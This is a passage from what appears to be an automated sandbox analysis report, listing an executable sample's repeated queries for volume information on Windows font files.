        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
